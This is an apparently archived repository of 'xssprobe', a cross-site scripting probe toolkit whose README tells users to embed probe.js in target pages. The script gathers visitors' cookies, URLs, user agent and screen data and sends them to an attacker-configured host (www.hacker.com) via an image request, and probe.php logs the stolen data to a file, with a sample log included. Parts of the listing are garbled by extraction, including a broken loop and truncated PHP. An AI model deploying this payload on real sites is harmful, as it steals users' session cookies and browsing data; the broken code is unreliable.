├── README ├── demo.html ├── probe.js ├── probe.php └── probe_data.html /README: -------------------------------------------------------------------------------- 1 | xssprobe 2 | 3 | xss探针脚本,用于获取被跨页面的通用数据。 4 | 5 | 使用说明: 6 | 7 | 1、修改probe.js: 8 | // 获取隐私信息的服务端页面,这里需配置为自己的probe.php网址 9 | http_server = "http://www.hacker.com/xssprobe/probe.php?c="; 10 | 2、在目标页面嵌入probe.js文件,可以参考demo.html(xssprobe demo page):) 11 | 12 | 13 | by evilcos@gmail.com 14 | 15 | ChangeLog 16 | ===================================== 17 | 18 | 2011/8/22 19 | v1 能获取的数据如下: 20 | browser, ua, lang, referer, location, toplocation, cookie, domain, title, screen, flash -------------------------------------------------------------------------------- /demo.html: -------------------------------------------------------------------------------- 1 |  2 | xssprobe demo page<script>alert(1)</script> 3 | 4 | 5 | 6 |

xssprobe demo

7 | 8 | 结果页面:./xssprobe/probe_data.html
9 | 获取数据样例: 10 | 11 | { 12 | 'browser': { 13 | 'name': 'mozilla', 14 | 'version': '6.0' 15 | }, 16 | 'ua': 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0) Gecko/20100101 Firefox/6.0', 17 | 'lang': 'zh-CN', 18 | 'referrer': 'http://www.0x37.com/xssprobe/', 19 | 'location': 'http://www.0x37.com/xssprobe/demo.html', 20 | 'toplocation': 'http://www.0x37.com/xssprobe/demo.html', 21 | 'cookie': 'xssprobe=1; popunder=yes; popundr=yes; setover18=1', 22 | 'domain': 'www.0x37.com', 23 | 'title': 'xssprobe demo page<script>alert(1)</script>', 24 | 'screen': '1440x900', 25 | 'flash': '10.3 r181' 26 | } 27 | 28 | 29 |
30 | --
by evilcos@gmail.com 2011/8/22
31 | 32 |
--------------------------------------------------------------------------------
/probe.js:
--------------------------------------------------------------------------------
/*
xssprobe
by evilcos@gmail.com | @xeyeteam

Summary of the code below: it fills the `info` object from navigator, document,
window and screen properties as the script is evaluated, and the window.onload
handler then serializes `info` and requests an image from `http_server` with
the serialized text appended to the URL.

NOTE(review): this listing was extracted from a rendered page. The line-number
gutter is not reproduced in this section, and part of info.flash was lost in
extraction (marked below), so the file is not runnable as shown.
*/

// Server-side page that receives the collected data; per the README this must
// be configured to the URL of your own probe.php.
// Assigned without var/let/const, so it becomes an implicit global.
http_server = "http://www.hacker.com/xssprobe/probe.php?c=";

var info = {}; // dictionary of the collected (private) information

// Browser name and version, parsed from the lower-cased user-agent string.
// The patterns are tried in the order webkit, opera, msie, mozilla; the
// mozilla pattern is only tried when the UA does not contain "compatible".
// Falls back to name "" and version "0" when nothing matches.
info.browser = function(){
    // `ua` is assigned without a declaration as well (implicit global).
    ua = navigator.userAgent.toLowerCase();
    var rwebkit = /(webkit)[ \/]([\w.]+)/;
    var ropera = /(opera)(?:.*version)?[ \/]([\w.]+)/;
    var rmsie = /(msie) ([\w.]+)/;
    var rmozilla = /(mozilla)(?:.*? rv:([\w.]+))?/;
    var match = rwebkit.exec( ua ) ||
        ropera.exec( ua ) ||
        rmsie.exec( ua ) ||
        ua.indexOf("compatible") < 0 && rmozilla.exec( ua ) ||
        [];
    return {name: match[1] || "", version: match[2] || "0"};
}();

// escape() is the legacy percent-encoding function. It is applied to ua,
// referrer, location, toplocation and cookie, but not to lang, domain or title.
info.ua = escape(navigator.userAgent);
info.lang = navigator.language;
info.referrer = escape(document.referrer);
info.location = escape(window.location.href);
// Not wrapped in try/catch: when the page is framed by a different origin,
// reading top.location.href throws, and an uncaught exception here would stop
// the rest of the script.
info.toplocation = escape(top.location.href);
// document.cookie only contains cookies that are readable from script; cookies
// set with the HttpOnly attribute are not part of this string.
info.cookie = escape(document.cookie);
info.domain = document.domain;
info.title = document.title;

// Screen size as "<width>x<height>", or "" when self.screen is falsy.
info.screen = function(){
    var c = "";
    if (self.screen) {c = screen.width+"x"+screen.height;}
    return c;
}();

// Flash version. `f` starts as "" and, in the code that survives below, is set
// to `ii + '.0'` when an ActiveX object can be created. The sample output on
// this page shows '10.3 r181', which presumably comes from the navigator.plugins
// branch that was lost in extraction.
info.flash = function(){
    var f="",n=navigator;
    if (n.plugins && n.plugins.length) {
        // NOTE(review): extraction damage. The listing's gutter jumps from
        // line 39 to line 49 here and the text between `ii` and `=2` is
        // missing. The next line is reproduced as it appears on the page and
        // is not the original loop header.
        for (var ii=0;ii=2;ii--) {
            try {
                // eval of a string that instantiates the ActiveX ProgID
                // ShockwaveFlash.ShockwaveFlash.<ii>; as shown, only the loop
                // counter is interpolated into the evaluated string.
                var fl=eval("new ActiveXObject('ShockwaveFlash.ShockwaveFlash."+ii+"');");
                if (fl) {
                    f=ii + '.0';
                    break;
                }
            }
            catch(e) {} // a failed instantiation is ignored; the loop continues
        }
    }
    return f;
}();

// Serializes an object into a single-quoted, JSON-like string, recursing into
// nested non-null objects. Strings and numbers are wrapped in single quotes;
// values of any other type are concatenated as they are. Quote characters in
// keys or values are not escaped, so the result is not strict JSON and a value
// containing ' changes the structure of the output. for...in also visits
// inherited enumerable properties.
function json2str(o) {
    var arr = [];
    var fmt = function(s) {
        if (typeof s == 'object' && s != null) return json2str(s);
        return /^(string|number)$/.test(typeof s) ? "'" + s + "'" : s;
    }
    for (var i in o) arr.push("'" + i + "':" + fmt(o[i]));
    return '{' + arr.join(',') + '}';
}

// Assigning window.onload replaces any handler previously set through this
// property. On load, `info` is serialized and used as the tail of an image URL,
// so the browser sends it in a GET request (the `c` parameter that probe.php
// reads). No URL-encoding is applied to the serialized string as a whole.
// Because the transport is an image request, a Content-Security-Policy
// `img-src` directive that does not list the receiving host blocks it.
window.onload = function(){
    var i = json2str(info);
    new Image().src = http_server + i;
}

--------------------------------------------------------------------------------
/probe.php:
--------------------------------------------------------------------------------
 1 | $value){ 44 | $content[$key] = stripslashes($value); 45 | } 46 | }else{ 47 | $content = stripslashes($content);} 48 | }else{} 49 | return $content; 50 | } 51 | 52 | if (!empty($_REQUEST["c"])){ 53 | $curtime = date("Y-m-d H:i:s"); 54 | $ip = get_real_ip(); 55 | $useragent = get_user_agent(); 56 | $referer = get_referer(); 57 | $data = $_REQUEST["c"]; 58 | if(!file_exists("probe_data.html")){ 59 | $fp = fopen("probe_data.html", "a+"); 60 | fwrite($fp, 'probe data'); 61 | fclose($fp); 62 | } 63 | $fp = fopen("probe_data.html", "a+"); 64 | fwrite($fp, "".htmlspecialchars(quotes($ip))." | $curtime
UserAgent: ".htmlspecialchars(quotes($useragent))."
Referer: ".htmlspecialchars(quotes($referer))."
DATA: ".htmlspecialchars(quotes($data))."

"); 65 | fclose($fp); 66 | } 67 | 68 | ?> -------------------------------------------------------------------------------- /probe_data.html: -------------------------------------------------------------------------------- 1 | probe data127.0.0.1 | 2011-08-22 14:36:08
UserAgent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0) Gecko/20100101 Firefox/6.0
Referer: http://www.0x37.com/xssprobe/demo.html
DATA: {'browser':{'name':'mozilla','version':'6.0'},'ua':'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0) Gecko/20100101 Firefox/6.0','lang':'zh-CN','referrer':'http://www.0x37.com/xssprobe/','location':'http://www.0x37.com/xssprobe/demo.html','toplocation':'http://www.0x37.com/xssprobe/demo.html','cookie':'xssprobe=1; popunder=yes; popundr=yes; setover18=1','domain':'www.0x37.com','title':'xssprobe demo page<script>alert(1)</script>','screen':'1440x900','flash':'10.3 r181'}

--------------------------------------------------------------------------------